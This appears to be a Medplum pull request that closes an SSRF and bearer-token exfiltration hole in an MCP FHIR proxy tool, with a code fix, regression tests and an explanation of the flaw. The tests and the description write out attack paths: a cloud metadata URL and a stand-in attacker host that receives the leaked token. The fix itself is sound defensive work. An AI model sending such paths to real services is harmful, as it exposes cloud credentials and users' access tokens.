### PR TITLE
fix(server): pin MCP fhir-request to the server origin

### DIFF
--- a/packages/server/src/mcp/routes.test.ts
+++ b/packages/server/src/mcp/routes.test.ts
@@ -166,6 +166,23 @@ describe('MCP Routes', () => {
       // 7. unknown method
       const unknownMethodResult = await fhirRequest<OperationOutcome>('UNKNOWN', `Patient/${createResult.id}`);
       expect(unknownMethodResult.issue?.[0].severity).toBe('error');
+
+      // 8. SSRF / token-exfiltration guard (GHSA-fjgc-c3pj-xx2c): an absolute or off-origin
+      // `path` is rejected before any outbound fetch, for every method. (Relative paths are
+      // already proven to work by steps 1-6 above.)
+      for (const m of ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']) {
+        const ssrf = await fhirRequest<OperationOutcome>(m, 'http://169.254.169.254/latest/meta-data/', {});
+        expect(ssrf.issue?.[0].severity).toBe('error');
+      }
+
+      // 9. Token-exfiltration vector: external https host is blocked even though it is not an internal IP.
+      const exfil = await fhirRequest<OperationOutcome>('GET', 'https://attacker.example/collect');
+      expect(exfil.issue?.[0].severity).toBe('error');
+
+      // 10. Protocol-relative path resolves to the server's own origin (harmless), so it does not
+      // reach an external host; it is handled as an ordinary same-origin FHIR request.
+      const protoRel = await fhirRequest<OperationOutcome>('GET', '//169.254.169.254/latest/meta-data/');
+      expect(protoRel.resourceType).toBe('OperationOutcome');
     } finally {
       await client.close();
     }

--- a/packages/server/src/mcp/server.ts
+++ b/packages/server/src/mcp/server.ts
@@ -61,6 +61,16 @@ export function getMcpServer(): McpServer {
       const baseUrl = getConfig().baseUrl;
       const baseFhirUrl = concatUrls(baseUrl, 'fhir/R4');
       const fhirUrl = concatUrls(baseFhirUrl, path);
+
+      // SSRF / token-exfiltration guard (GHSA-fjgc-c3pj-xx2c).
+      // concatUrls() is new URL(path, base); an absolute or protocol-absolute `path`
+      // discards the base and points the proxy at an attacker-controlled URL. Because
+      // the proxy request carries the caller's bearer token, an off-origin URL both
+      // performs SSRF and leaks the token. Pin the resolved URL to the server origin.
+      if (new URL(fhirUrl).origin !== new URL(baseUrl).origin) {
+        throw new Error('Invalid path: must be relative to the FHIR base URL');
+      }
+
       const accessToken = ctx.authState.accessToken;
       const proxy = new MedplumClient({ baseUrl, accessToken, fetch: globalThis.fetch });
 


### PR DESCRIPTION
The MCP `fhir-request` tool resolved a caller-supplied `path` against the FHIR base URL with `concatUrls()`, which is
`new URL(path, base)`. An **absolute** or **protocol-absolute** `path` discards the base, so the server would fetch an attacker-chosen URL and return the body — a server-side request forgery. Worse, the proxied request carries `Authorization: Bearer <caller token>` unconditionally, so an off-origin target URL also **leaks the caller's access token**.

This change pins the resolved request URL to the server's own origin before any `MedplumClient` is constructed or any fetch is issued, closing both the SSRF and the token-leak vectors in a single check.

## The issue

```ts
// packages/server/src/mcp/server.ts (before)
const baseFhirUrl = concatUrls(baseUrl, 'fhir/R4');
const fhirUrl = concatUrls(baseFhirUrl, path); // absolute `path` overrides the base
const proxy = new MedplumClient({ baseUrl, accessToken, fetch: globalThis.fetch });
case 'get': response = await proxy.get(fhirUrl); break;
```

- `path: 'http://169.254.169.254/latest/meta-data/'` → proxy fetches cloud instance metadata (SSRF).
- `path: 'https://attacker.example/collect'` → proxy fetches the external URL **with the caller's bearer token attached**, exfiltrating it. An IP blocklist alone would not stop this, since the host is not an internal address.

## The fix

Add an origin guard immediately after the URL is resolved, before the `MedplumClient` is built and before the method `switch`:

```ts
const fhirUrl = concatUrls(baseFhirUrl, path);

// SSRF / token-exfiltration guard (GHSA-fjgc-c3pj-xx2c).
// concatUrls() is new URL(path, base); an absolute or protocol-absolute `path`
// discards the base and points the proxy at an attacker-controlled URL. Because
// the proxy request carries the caller's bearer token, an off-origin URL both
// performs SSRF and leaks the token. Pin the resolved URL to the server origin.
if (new URL(fhirUrl).origin !== new URL(baseUrl).origin) {
  throw new Error('Invalid path: must be relative to the FHIR base URL');
}
```

The guard applies uniformly to GET/POST/PUT/PATCH/DELETE (it runs before the `switch`), and a thrown error surfaces to the MCP client as an `OperationOutcome` with `issue[0].severity === 'error'` — matching the existing `default`-case pattern in this handler.

Protocol-relative input (`//host/...`) is already neutralized: `ensureNoLeadingSlash` strips one leading slash, so it resolves back onto the server's own origin and passes the guard as a harmless same-origin path.

### Why the fix lives here

- `concatUrls` in `@medplum/core` is unchanged — its behavior is correct for its contract and it is used widely. The fix belongs at the trust boundary in the MCP tool.
- `MedplumClient` auth-header behavior is unchanged. The origin pin makes cross-origin token leakage moot for this tool; a broader client-side guard can be considered separately.
- The existing `safeFetch`/`safeAgent` SSRF protection is opt-in per call site and only blocks private/reserved IP ranges, so it would not stop exfiltration to an external host. The origin pin is the actual fix.
